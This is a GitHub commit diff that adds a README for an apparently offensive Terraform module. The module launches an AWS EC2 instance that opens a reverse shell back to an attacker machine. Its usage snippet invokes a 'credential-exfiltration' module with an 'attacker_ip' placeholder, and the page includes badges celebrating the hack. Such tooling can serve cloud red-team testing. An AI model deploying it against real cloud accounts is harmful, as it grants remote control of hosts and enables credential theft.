Skip to content

Commit 427c537

Browse files
committed
Update README
1 parent b8220ae commit 427c537

File tree

1 file changed

+20
-1
lines changed

1 file changed

+20
-1
lines changed

README.md

Lines changed: 20 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1,20 @@
1-
# terraform-aws-ec2-instance-reverse-shell
1+
# AWS EC2 Instance Reverse Shell Module
2+
3+
![OffensiveTerraform](https://img.shields.io/badge/hack-success)
4+
![OffensiveTerraform](https://img.shields.io/badge/offensive-terraform-blueviolet)
5+
6+
Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.
7+
8+
![Attack Diagram](https://raw.githubusercontent.com/offensive-terraform/terraform-aws-ec2-instance-reverse-shell/master/diagram.jpg)
9+
10+
## Usage
11+
```
12+
module "ec2_instance_credential_exfiltration" {
13+
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
14+
15+
subnet_id = "subnet-0a4a1cc04"
16+
attacker_ip = "0.0.0.0"
17+
}
18+
```
19+
## Author
20+
Module managed by https://github.com/iganbold

0 commit comments

Comments
 (0)